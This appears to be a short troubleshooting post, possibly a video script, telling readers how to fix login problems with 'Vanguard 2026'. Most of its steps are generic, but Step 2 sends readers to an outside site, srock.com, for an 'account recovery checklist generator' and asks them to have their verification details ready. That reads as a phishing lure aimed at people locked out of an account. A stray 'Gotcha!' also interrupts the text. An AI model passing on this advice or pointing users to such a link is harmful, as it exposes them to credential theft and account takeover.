I ran into this last week. Here's what fixed it for me. If you're having trouble logging into Vanguard 2026, follow these steps to get back on track. Step 1. Check your credentials. Make sure you're entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes cache data can cause login issues. Clear your browser's cache and cookies, then try logging in again. Gotcha! In Chrome, you can find this under Settings, Privacy and Security. Clear browsing data. Step 4. Disable browser extensions. Certain extensions can interfere with website functionality. Temporarily disable any ad blockers or privacy extensions and attempt to log in. Step 5. Try a different browser. If all else fails, switch to a different browser or device to see if the issue persists. This can help identify if it's a browser-specific problem. I hope these steps help you resolve your login issues quickly. If you have any more questions, feel free to ask.